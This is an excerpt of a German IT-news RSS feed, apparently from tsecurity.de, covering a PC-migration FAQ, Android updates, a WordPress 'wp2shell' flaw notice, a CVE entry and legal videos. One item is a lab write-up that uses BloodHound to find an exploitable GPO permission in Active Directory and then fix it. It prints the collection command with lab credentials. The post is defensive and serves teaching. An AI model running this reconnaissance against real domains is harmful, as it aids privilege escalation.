<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">2.</span>
<h3 class="wp-block-heading"><strong>Was ist besser: Umzugssoftware oder Neuinstallation?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Das hängt vom Zustand des alten PCs ab. Ist das System gut gepflegt und sollen viele Programme mitkommen, spart Umzugssoftware viel Zeit. Ist der alte Rechner dagegen über Jahre langsam, unübersichtlich oder fehleranfällig geworden, ist eine saubere Neuinstallation oft die bessere Wahl. Dann übernehmen Sie nur Daten und installieren Programme gezielt neu.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">3.</span>
<h3 class="wp-block-heading"><strong>Werden auch Passwörter und Browserdaten übertragen?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Teilweise. Browserdaten wie Lesezeichen, Verlauf und Erweiterungen lassen sich meist über das jeweilige Browserkonto synchronisieren, etwa bei Edge, Chrome oder Firefox. Gespeicherte Passwörter sollten Sie vor dem Umzug prüfen und am besten zusätzlich in einem Passwortmanager sichern. Verlassen Sie sich nicht ausschließlich darauf, dass eine Umzugssoftware alle Zugangsdaten vollständig übernimmt.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">4.</span>
<h3 class="wp-block-heading"><strong>Muss der alte PC während des Umzugs weiter funktionieren?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Für den direkten Transfer über das Netzwerk ja. Beide Rechner müssen eingeschaltet und erreichbar sein. Alternativ können einige Programme ein Umzugsabbild auf einer externen Festplatte erstellen. Das ist praktisch, wenn der neue PC noch nicht bereitsteht oder der alte Rechner nur noch eingeschränkt nutzbar ist.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">5.</span>
<h3 class="wp-block-heading"><strong>Was sollte ich nach dem Umzug zuerst prüfen?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Starten Sie den neuen PC neu und führen Sie Windows Update aus. Danach sollten Sie wichtige Programme öffnen, Lizenzaktivierungen kontrollieren, Drucker und Scanner testen, Mailkonten prüfen und sicherstellen, dass Cloud-Dienste wie OneDrive vollständig synchronisieren. Öffnen Sie außerdem stichprobenartig wichtige Dokumente, Bilder und Projektordner.</p>
</div>
</div></div>
</div>



<p></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kritische WordPress-Schwachstelle wp2shell erlaubt CMS-Übernahme]]></title>
<description><![CDATA[Unschöne Information: In WordPress gibt es einen kritische Schwachstelle, die die Entdecker als wp2shell bezeichnen, die eine CMS-Übernahme erlaubt. WordPress 6.9.5 und WordPress 7.0.2 sind gegen die Schwachstelle gehärtet. Die Entdecker haben zudem eine Check-Seite online gestellt, die prüft, ob...]]></description>
<link>https://tsecurity.de/de/3679114/it-nachrichten/kritische-wordpress-schwachstelle-wp2shell-erlaubt-cms-uebernahme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679114/it-nachrichten/kritische-wordpress-schwachstelle-wp2shell-erlaubt-cms-uebernahme/</guid>
<pubDate>Sun, 19 Jul 2026 10:17:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unschöne Information: In WordPress gibt es einen kritische Schwachstelle, die die Entdecker als wp2shell bezeichnen, die eine CMS-Übernahme erlaubt. WordPress 6.9.5 und WordPress 7.0.2 sind gegen die Schwachstelle gehärtet. Die Entdecker haben zudem eine Check-Seite online gestellt, die prüft, ob … <a href="https://borncity.com/blog/2026/07/19/kritische-wordpress-schwachstelle-wp2shell-erlaubt-cms-uebernahme/">Weiterlesen <span class="meta-nav">→</span></a>
<p><a href="https://borncity.com/blog/2026/07/19/kritische-wordpress-schwachstelle-wp2shell-erlaubt-cms-uebernahme/" rel="nofollow">Quelle</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Diese neuen Funktionen bekommen Android-Nutzer im Juli]]></title>
<description><![CDATA[Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr Smartphone haben (unabhängig vom Hersteller).



Die Seite 9to5Google hat die wichtigsten Neuerungen zusammengefasst. Demnach bek...]]></description>
<link>https://tsecurity.de/de/3679044/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679044/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</guid>
<pubDate>Sun, 19 Jul 2026 09:17:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">Smartphone </a>haben (unabhängig vom Hersteller).</p>



<p>Die Seite <a href="https://9to5google.com/2026/07/09/android-documents-backup/" target="_blank" rel="noreferrer noopener">9to5Google</a> hat die wichtigsten Neuerungen zusammengefasst. Demnach bekommen Android-Nutzer die Option, die Sicherung von SMS-, MMS- und RCS-Nachrichten direkt zu steuern. Das ähnelt der <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">separaten Backup-Einstellung für ausgewählte Apps</a>, die wir Ihnen letzte Woche vorgestellt hatten.</p>



<p>Über <strong>Einstellungen &gt; Konten und Sicherung &gt; Google-Sicherung &gt; Weitere Gerätedaten</strong> gibt es nach Erhalt des Updates einen neuen Ein-/Aus-Schalter für SMS- und MMS-Nachrichten, Anrufverlauf und Geräteeinstellungen. Sie haben also deutlich mehr Kontrolle darüber, welche Daten Sie über die Google-Cloud speichern wollen.</p>



<p>Das ist auch besonders wichtig, da Google seit Neuestem <a href="https://www.pcwelt.de/article/3185747/google-erlaubt-android-nutzern-ab-sofort-kein-kostenloses-backup-mehr-speicherplatz-angererechnet.html" target="_blank" rel="noreferrer noopener">keine Gratis-Backups für Android-Geräte mehr erlaubt</a>. Jedes Backup Ihres Smartphones zählt also direkt auf Ihr verfügbares Speicherkontingent ein, das in der Gratis-Variante gerade einmal 15 GB sind.</p>



<p>Zusätzlich führt Android nun die lokale Sicherung von Dokumenten ein. Damit können Sie Ihre heruntergeladenen Dokumente automatisch in Google Drive speichern, damit diese sicher und von jedem Ihrer Geräte aus zugänglich sind. Auf der Seite „Sicherung“ erscheint dann neben „Fotos &amp; Videos“ und „Sonstige Gerätedaten“ ein neues Menü namens „Dokumente“.</p>



<p>Google erklärt, dass zu den unterstützten Dateiformaten .DOC, .PPT, .XLS, .PDF “und alle anderen auf diesem Gerät gespeicherten Dokumente” gehören. Dokumente sollen bei der Übertragung zwischen Ihrem Gerät und den Google-Diensten verschlüsselt werden. Änderungen, die an den Dokumenten an einem Ort vorgenommen werden, werden nicht mit anderen Orten synchronisiert.</p>



<h3 class="wp-block-heading">Mehr Neuerungen</h3>



<p>In den <a href="https://support.google.com/product-documentation/answer/14343500?hl=de" target="_blank" rel="noreferrer noopener">Versionshinweisen zu den Google-Systemdiensten</a> finden sich noch mehr kleine Neuerungen, die jetzt an Android-Nutzer ausgerollt werden. Dazu gehören unter anderem die Überarbeitung von In-App-Käufen mithilfe einer “verbesserten, nativen Storefront für Google One”, die Übertragung von Arbeitsprofilen auf Wear-OS-Smartwatches, eine neue Google-Standortfreigabe für Chromebooks sowie „neue Funktionen für Entwickler von Google- und Drittanbieter-Apps zur Unterstützung von Prozessen in ihren Apps im Zusammenhang mit Google Maps”.</p>



<p>All diese neuen Funktionen werden seit dem 6. Juli an Android-Nutzer verteilt. Über <strong>Einstellungen</strong> <strong>&gt;</strong> <strong>Sicherheit und Datenschutz</strong> <strong>&gt;</strong> <strong>Updates</strong> <strong>&gt;</strong> <strong>Google Play-Systemupdate</strong> können Sie die aktuell installierte Version der Google Play System Updates prüfen und gegebenenfalls auf eine neue Version aktualisieren.</p>



<p><a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-bekommen-das-update-komplette-geraeteliste.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50151 | oras-project oras-go up to 2.6.0 BlobStore repository.go completePushAfterInitialPost improper authorization (Nessus ID 327786)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in oras-project oras-go up to 2.6.0. Impacted is the function completePushAfterInitialPost of the file registry/remote/repository.go of the component BlobStore. This manipulation causes improper authorization.

This vulnerability is registe...]]></description>
<link>https://tsecurity.de/de/3678660/sicherheitsluecken/cve-2026-50151-oras-project-oras-go-up-to-260-blobstore-repositorygo-completepushafterinitialpost-improper-authorization-nessus-id-327786/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678660/sicherheitsluecken/cve-2026-50151-oras-project-oras-go-up-to-260-blobstore-repositorygo-completepushafterinitialpost-improper-authorization-nessus-id-327786/</guid>
<pubDate>Sun, 19 Jul 2026 02:20:46 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/oras-project:oras-go">oras-project oras-go up to 2.6.0</a>. Impacted is the function <code>completePushAfterInitialPost</code> of the file <em>registry/remote/repository.go</em> of the component <em>BlobStore</em>. This manipulation causes improper authorization.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-50151">CVE-2026-50151</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[EU Orders Google to Open Search Data and Android Features to Competitors Amid Privacy, Security Concerns]]></title>
<description><![CDATA[The European Commission has officially instructed Google to hand over its internal search registry to direct marketplace competitors. This groundbreaking legal command forces the massive American search provider to open its popular Android operating system to rival software tools. The binding spe...]]></description>
<link>https://tsecurity.de/de/3678341/it-security-nachrichten/eu-orders-google-to-open-search-data-and-android-features-to-competitors-amid-privacy-security-concerns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678341/it-security-nachrichten/eu-orders-google-to-open-search-data-and-android-features-to-competitors-amid-privacy-security-concerns/</guid>
<pubDate>Sat, 18 Jul 2026 19:53:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The European Commission has officially instructed Google to hand over its internal search registry to direct marketplace competitors. This groundbreaking legal command forces the massive American search provider to open its popular Android operating system to rival software tools. The binding specifications, which officials issued under the strict European Digital Markets Act, represent a major […]</p>
<p>The post <a href="https://privacysavvy.com/news/cybersecurity/eu-orders-google-open-search-data-android-features/">EU Orders Google to Open Search Data and Android Features to Competitors Amid Privacy, Security Concerns</a> appeared first on <a href="https://privacysavvy.com/">PrivacySavvy</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RÜCKTRITT wegen Baby! Jens Spahns Leihmutter-Dilemma]]></title>
<description><![CDATA[Author: WBS LEGAL - Bewertung: 164x - Views:2127 Dein BAföG-Antrag wurde abgelehnt, falsch berechnet oder nicht bearbeitet? Wir helfen dir. ➔ https://wbs.law/bafoeg

Einer deiner Social-Media-Accounts, PayPal- oder ähnliches wurde gesperrt? ➔ https://wbs.law/account-gesperrt

Du hast eine Abmahnu...]]></description>
<link>https://tsecurity.de/de/3678221/videos/ruecktritt-wegen-baby-jens-spahns-leihmutter-dilemma/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678221/videos/ruecktritt-wegen-baby-jens-spahns-leihmutter-dilemma/</guid>
<pubDate>Sat, 18 Jul 2026 18:04:50 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: WBS LEGAL - Bewertung: 164x - Views:2127 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/yxJJCNu0xsc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Dein BAföG-Antrag wurde abgelehnt, falsch berechnet oder nicht bearbeitet? Wir helfen dir. ➔ https://wbs.law/bafoeg<br />
<br />
Einer deiner Social-Media-Accounts, PayPal- oder ähnliches wurde gesperrt? ➔ https://wbs.law/account-gesperrt<br />
<br />
Du hast eine Abmahnung wegen angeblichen illegalen Downloads erhalten? ➔ https://wbs.law/filesharing<br />
▬▬▬▬▬▬▬▬▬▬▬▬▬ <br />
<br />
Ein Familienfoto, ein Sturm der Empörung und nur drei Tage später der Rücktritt: Jens Spahn gibt den Vorsitz der Unionsfraktion ab, nachdem er und sein Ehemann mithilfe einer Leihmutter in den USA Eltern geworden sind. Hat Spahn deutsches Recht umgangen oder ist sein Vorgehen legal? Wir rekonstruieren die Eskalation, prüfen seine früheren Aussagen und erklären, wen das deutsche Verbot tatsächlich trifft.<br />
<br />
Tagesschau – Rücktritt und Schreiben im Wortlaut: https://www.tagesschau.de/inland/innenpolitik/jens-spahn-ruecktritt-100.html<br />
ZDFheute – War Spahns Vorgehen legal?: https://www.zdfheute.de/panorama/jens-spahn-leihmutterschaft-legal-100.html<br />
GQ – Spahns Gastbeitrag von 2015: https://www.gq-magazin.de/leben-als-mann/features/pro-contra-leihmutterschaft-respektiert-meine-zurueckhaltung<br />
Deutscher Bundestag – Antwort der Bundesregierung 2020: https://www.bundestag.de/webarchiv/presse/hib/2020_04/693042-693042<br />
CDU – Anträge des 38. Parteitags, Antrag O06 auf S. 383: https://www.cdu.de/app/uploads/2026/02/202602_Sammlung-der-Antraege_38-Parteitag.pdf<br />
BGH – Beschluss XII ZB 463/13: https://juris.bundesgerichtshof.de/cgi-bin/bgh_notp/document.py?Art=en&Datum=2014-12&Gericht=bgh&Seite=4&anz=229&nr=34692&pos=137<br />
Auswärtiges Amt – FAQ zur Leihmutterschaft: https://www.auswaertiges-amt.de/de/service/fragenkatalog-node/06-leihmutterschaft-606160<br />
BMG – Bericht der Kommission zur reproduktiven Selbstbestimmung: https://www.bundesgesundheitsministerium.de/presse/pressemitteilungen/kommissionsbericht-reproduktive-selbstbestimmung-pm-15-04-24<br />
Ronzheimer-Podcast – Interview mit Jens Spahn: https://www.youtube.com/watch?v=WRIMLz5bh3g<br />
Tagesschau/NDR – Rücktrittsforderung von Daniel Peters: https://www.tagesschau.de/inland/regional/mecklenburgvorpommern/kritik-an-leihmutterschaft-cdu-in-mv-fordert-spahns-ruecktritt%2Cspahn-746.html<br />
Deutschlandfunk – Interview mit Wolfgang Bosbach: https://www.deutschlandfunk.de/spahns-leihmutterschaft-interview-mit-wolfgang-bosbach-cdu-100.html<br />
Reddit r/de – Debatte vor dem Rücktritt: https://www.reddit.com/r/de/comments/1uyvkdj/umstrittene_leihmutterschaft_erster/<br />
Reddit r/de – Reaktionen auf den Rücktritt: https://www.reddit.com/r/de/comments/1uztkrb/jens_spahn_tritt_als_unionsfraktionschef_zur%C3%BCck/<br />
Tagesschau/NDR – Internationales Leihmuttergeschäft: https://www.tagesschau.de/investigativ/ndr/leihmuetter-geschaeft-international-100.html<br />
§ 1 ESchG: https://www.gesetze-im-internet.de/eschg/__1.html<br />
§ 13b AdVermiG: https://www.gesetze-im-internet.de/advermig_1976/__13b.html<br />
§ 13c AdVermiG: https://www.gesetze-im-internet.de/advermig_1976/__13c.html<br />
§ 14b AdVermiG: https://www.gesetze-im-internet.de/advermig_1976/__14b.html<br />
§ 1591 BGB: https://www.gesetze-im-internet.de/bgb/__1591.html<br />
§ 1592 BGB: https://www.gesetze-im-internet.de/bgb/__1592.html<br />
§ 108 FamFG: https://www.gesetze-im-internet.de/famfg/__108.html<br />
§ 109 FamFG: https://www.gesetze-im-internet.de/famfg/__109.html<br />
<br />
<br />
▬▬▬▬▬▬▬▬▬▬▬▬▬ <br />
WBS.LEGAL sucht dich! Du bist auf der Suche nach einem attraktiven, spannenden und anspruchsvollen Job? Dann bewirb dich bei uns und komm in unser Team. Bei WBS.LEGAL arbeitest du im Herzen der Medienhauptstadt Köln und bist im Berufsleben immer am Puls der Zeit – garantiert. Hier unsere offenen Stellenangebote: https://www.wbs.legal/karriere/#jobs Was erwartet dich bei uns? Hier bekommst du weitere Infos: https://www.wbs.legal/karriere/. <br />
<br />
▬▬▬▬▬▬▬▬▬▬▬▬▬ <br />
Rechtsanwalt Prof. Christian Solmecke Prof. Christian Solmecke hat sich als Rechtsanwalt und Partner der Kölner Medienrechtskanzlei WBS.LEGAL auf die Beratung der Internet-, IT- und Medienbranche spezialisiert. So hat er in den vergangenen Jahren den Bereich Internetrecht/E-Commerce der Kanzlei stetig ausgebaut und betreut zahlreiche Medienschaffende, Web-2.0-Plattformen und App- Entwickler. Neben seiner Tätigkeit als Rechtsanwalt ist Prof. Christian Solmecke vielfacher Buchautor und als Gründer der cloudbasierten Kanzleisoftware Legalvisio.de auch erfolgreicher LegalTech-Unternehmer.<br />
<br />
 ▬▬▬▬▬▬▬▬▬▬▬▬▬ <br />
Virtueller Kanzlei-Rundgang: https://wbs.law/rundgang Startet euren Rundgang in 3D und 360° durch die Kanzlei WBS.LEGAL (inkl. YouTube- Studio) <br />
<br />
▬▬▬▬▬▬▬▬▬▬▬▬▬ <br />
Social-Media-Kanäle von WBS.LEGAL Wir freuen uns, wenn du uns auch auf unseren weiteren Social-Media-Kanälen besuchst und uns dort folgst. Jeder unserer Kanäle steht für sich und bringt dir garantiert einen Mehrwert. <br />
<br />
<br />
<br />
▬Kontakt▬ <br />
Hotline: 0221 / 400 67 550 E-Mail: info@wbs.legal<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KDnuggets Weekly Roundup: Week of July 13, 2026]]></title>
<description><![CDATA[Stop Using If-Else Chains: Use the Registry Pattern in Python Instead • 5 Real-World SQL Projects to Build Your Data Portfolio • 10 YouTube Channels Keeping You Ahead in AI • Structured Language Model Generation with Outlines]]></description>
<link>https://tsecurity.de/de/3678054/ai-nachrichten/kdnuggets-weekly-roundup-week-of-july-13-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678054/ai-nachrichten/kdnuggets-weekly-roundup-week-of-july-13-2026/</guid>
<pubDate>Sat, 18 Jul 2026 15:20:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Stop Using If-Else Chains: Use the Registry Pattern in Python Instead • 5 Real-World SQL Projects to Build Your Data Portfolio • 10 YouTube Channels Keeping You Ahead in AI • Structured Language Model Generation with Outlines]]></content:encoded>
</item>
<item>
<title><![CDATA[Abzocke Sofortrente 🧐💰❌]]></title>
<description><![CDATA[Author: WBS LEGAL - Bewertung: 25x - Views:813 Hast du oder deine Verwandten mal eine Sofortrente abgeschlossen? Wir erklären dir, warum das meist eine absolute Abzocke ist - und wie du dein Geld evtl. sogar zurückholen kannst ☝🏼💶

Für mehr Infos zu dem Thema, schaue Dir jetzt das ganze Video auf...]]></description>
<link>https://tsecurity.de/de/3677912/videos/abzocke-sofortrente/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677912/videos/abzocke-sofortrente/</guid>
<pubDate>Sat, 18 Jul 2026 13:32:23 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: WBS LEGAL - Bewertung: 25x - Views:813 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/H0urIHeSlyk?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Hast du oder deine Verwandten mal eine Sofortrente abgeschlossen? Wir erklären dir, warum das meist eine absolute Abzocke ist - und wie du dein Geld evtl. sogar zurückholen kannst ☝🏼💶<br />
<br />
Für mehr Infos zu dem Thema, schaue Dir jetzt das ganze Video auf unserem YouTube-Kanal an oder gehe direkt auf unsere Seite 👉🏼 wbs.law/rente 🔗<br />
<br />
#sofortrente #wbslegal #recht2go #rechtstipps #fürdich<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How I Abused a Group Policy Object (GPO) in Active Directory (And How to Fix It)]]></title>
<description><![CDATA[Group Policy Objects (GPOs) are one of the most powerful features in Active Directory. They allow administrators to manage settings across computers and users.But if the wrong user has control over a GPO, it can become an easy privilege escalation path.In this lab, I’ll use BloodHound to identify...]]></description>
<link>https://tsecurity.de/de/3677783/hacking/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677783/hacking/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it/</guid>
<pubDate>Sat, 18 Jul 2026 11:39:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IYSV94Q4TKE53NHop9sBDw.png"></figure><p>Group Policy Objects (GPOs) are one of the most powerful features in Active Directory. They allow administrators to manage settings across computers and users.</p><p>But if the wrong user has control over a GPO, it can become an easy privilege escalation path.</p><p>In this lab, I’ll use <strong>BloodHound</strong> to identify a dangerous GPO permission and then show how to fix it.</p><h3>Lab Setup</h3><ul><li><strong>Domain:</strong> LAB.LOCAL</li><li><strong>Domain Controller:</strong> 192.168.56.104</li><li><strong>Attacker:</strong> Kali Linux</li><li><strong>User:</strong> bob</li></ul><h3>Step 1 — Collect Active Directory Data</h3><p>First, I collected information from Active Directory using <strong>BloodHound.py</strong>.</p><pre>bloodhound-python -u bob -p 'password@123' -d lab.local -ns 192.168.56.104 -c All --zip</pre><p>BloodHound successfully collected:</p><ul><li>8 Users</li><li>55 Groups</li><li>3 GPOs</li><li>2 OUs</li><li>1 Computer</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jA0bN8_u-FCRSuDjOdIbFg.png"></figure><h3>Step 2 — Import into BloodHound</h3><p>Next, I uploaded the generated ZIP file into BloodHound Community Edition.</p><p>BloodHound maps relationships between users, groups, computers, OUs, and GPOs, making it much easier to spot privilege escalation paths.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*T0gcQnP34CNfRQp0qFv4hw.png"></figure><h3>Step 3 — Finding the Misconfiguration</h3><p>BloodHound showed that <strong>Bob</strong> had <strong>WriteDacl</strong>, <strong>WriteOwner</strong>, and <strong>GenericWrite</strong> permissions over the <strong>Employees Policy</strong> GPO.</p><p>These permissions are dangerous because they allow a user to modify who controls the GPO or change its configuration.</p><h3>Why Is This Dangerous?</h3><p>If an attacker can edit a GPO linked to an Organizational Unit (OU), they may be able to:</p><ul><li>Execute scripts on domain computers</li><li>Deploy scheduled tasks</li><li>Add users to local Administrators</li><li>Push malicious registry changes</li><li>Gain higher privileges across the domain</li></ul><p>A single misconfigured GPO can impact many systems at once.</p><h3>Step 4 — Fixing the Issue</h3><p>On the Domain Controller:</p><pre>Group Policy Management<br>        ↓<br>Employees Policy<br>        ↓<br>Delegation</pre><p>Review who has permissions on the GPO.</p><p>Remove unnecessary permissions such as:</p><ul><li>GenericWrite</li><li>misconfiguredWriteDacl</li><li>WriteOwner</li></ul><p>Only trusted administrators should have these rights.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1021/1*FC8s8UA4FIWW0lay8j9Ikw.png"></figure><h3>Verify the Fix</h3><p>Run BloodHound again after updating the permissions.</p><pre>bloodhound-python -u bob -p 'password@123' -d lab.local -ns 192.168.56.104 -c All --zip</pre><p>Re-import the ZIP into BloodHound.</p><p>The dangerous permission edges should no longer appear for <strong>Bob</strong>.</p><h3>Key Takeaways</h3><p>1.Regularly audit GPO permissions.</p><p>2. Use the principle of least privilege.</p><p>3. Review BloodHound findings periodically.</p><p>4. Remove unnecessary <strong>GenericWrite</strong>, <strong>WriteDacl</strong>, and <strong>WriteOwner</strong> permissions.</p><blockquote><strong><em>Disclaimer:</em></strong><em> </em>The techniques demonstrated in this article were performed in a private Active Directory lab for learning purposes. Always obtain proper authorization before testing any production environment.</blockquote><p><em>— Written by</em></p><p><strong>Aruvasaga Chithan A</strong></p><p><strong>Ethical Hacker &amp; Cyber Security Researcher.</strong></p><p><strong>Thanks for reading — your support keeps me writing.</strong><br><strong>See you in the next article…</strong></p><p><a href="http://www.linkedin.com/in/aruvasaga-chithan"><em>Linkedin</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5d59c031e602" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/how-i-abused-a-group-policy-object-gpo-in-active-directory-and-how-to-fix-it-5d59c031e602">How I Abused a Group Policy Object (GPO) in Active Directory (And How to Fix It)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alt gegen neu: Wie Sie Ihr altes Notebook richtig verkaufen oder recyceln]]></title>
<description><![CDATA[Irgendwann ist für jeden Laptop die Zeit gekommen, dass er aussortiert wird. Sei es, weil Sie ein neueres und besseres Gerät gefunden haben, oder weil das alte Notebook den Geist aufgegeben hat und auf den Wertstoffhof gebracht wird.



In jedem Fall gibt es einige wichtige Schritte, die Sie vor ...]]></description>
<link>https://tsecurity.de/de/3677564/it-nachrichten/alt-gegen-neu-wie-sie-ihr-altes-notebook-richtig-verkaufen-oder-recyceln/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677564/it-nachrichten/alt-gegen-neu-wie-sie-ihr-altes-notebook-richtig-verkaufen-oder-recyceln/</guid>
<pubDate>Sat, 18 Jul 2026 09:02:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Irgendwann ist für jeden Laptop die Zeit gekommen, dass er aussortiert wird. Sei es, weil Sie ein neueres und besseres Gerät gefunden haben, oder weil das alte Notebook den Geist aufgegeben hat und auf den Wertstoffhof gebracht wird.</p>



<p>In jedem Fall gibt es einige wichtige Schritte, die Sie vor der Entsorgung oder dem Verkauf Ihres alten Geräts beachten sollten. Welche das sind, stellen wir hier vor.</p>



<h2 class="wp-block-heading">Schritt 1: Daten sauber löschen</h2>



<p>Zuallererst sollten Sie sich um die noch vorhandenen Daten auf Ihrem Gerät kümmern. Dazu gehört wirklich alles, von Fotos und Dokumenten über Einstellungen bis hin zu angemeldeten Konten. Damit stellen Sie sicher, dass niemand an diese Informationen gelangen kann.</p>



<p>Die einfachste Möglichkeit ist hier natürlich das Zurücksetzen des Laptops. Unter Windows 11 gehen Sie dazu wie folgt vor:</p>



<ol class="wp-block-list">
<li>Öffnen Sie die Einstellungen über das Startmenü oder <strong>Windows + I. </strong></li>



<li>Klicken Sie auf <strong>System</strong> und dann auf <strong>Wiederherstellung</strong>.</li>



<li>Wählen Sie dann <strong>PC zurücksetzen</strong> aus.</li>
</ol>



<p>Der Assistent führt Sie dann durch den Prozess. Wählen Sie beim Punkt, wo es um den Umgang mit vorhandenen Dateien geht, die Option <strong>Alles entfernen</strong>, um sämtliche Apps, Einstellungen und persönliche Daten zu löschen. Danach sollten Sie zusätzlich <strong>Laufwerk bereinigen</strong> in den zusätzlichen Einstellungen auswählen, damit die Daten auch nicht wiederhergestellt werden können.</p>



<p>Der Vorgang kann eine Weile dauern. Neben den persönlichen Daten sorgt das Zurücksetzen auch dafür, dass Windows 11 wieder sauber neu installiert wird. Dadurch können auch einige Probleme behoben werden, die das System ausgebremst oder beeinträchtigt haben.</p>



<p>Wenn Sie Windows nicht neu installieren wollen, können Sie auch eine manuelle Datenlöschung anstoßen. Das ist aber unter Umständen etwas zeitaufwendiger, denn Sie müssen nicht nur alle Apps deinstallieren, sondern auch die <a href="https://www.pcwelt.de/article/1112301/datenloeschung-ratgeber-so-loeschen-sie-daten-unwiderruflich.html" target="_blank" rel="noreferrer noopener">Festplatte freiräumen</a> und Ihr Windows-Konto entfernen. Letzteres geht unter <strong>Einstellungen – Konten.</strong></p>



<p><strong>Wichtig: </strong>Wenn Sie einen Teil der Daten noch benötigen, sichern Sie diese am besten vorher in der Cloud oder auf einem externen Speichermedium.</p>



<h2 class="wp-block-heading">Schritt 2: Für den Verkauf vorbereiten</h2>



<p>Wenn Sie den Laptop verkaufen und nicht recyceln wollen, sollten Sie zumindest oberflächlich reinigen. Entfernen Sie dazu Staub, Krümel und Fingerabdrücke, am besten mit einem <a href="https://www.amazon.de/Amazon-Basics-Mikrofaser-Reinigungstuch-Mehrfarbig/dp/B009FUF6DM?tag=pcwelt.de-21&amp;ascsubtag=rss">Mikrofasertuch </a>oder einem <a href="https://www.amazon.de/Tastatur-Reinigungsset-Tastaturreiniger-Keyboard-PC-Monitor/dp/B0BKLFX6K4?tag=pcwelt.de-21&amp;ascsubtag=rss">Reinigungsset</a>.</p>



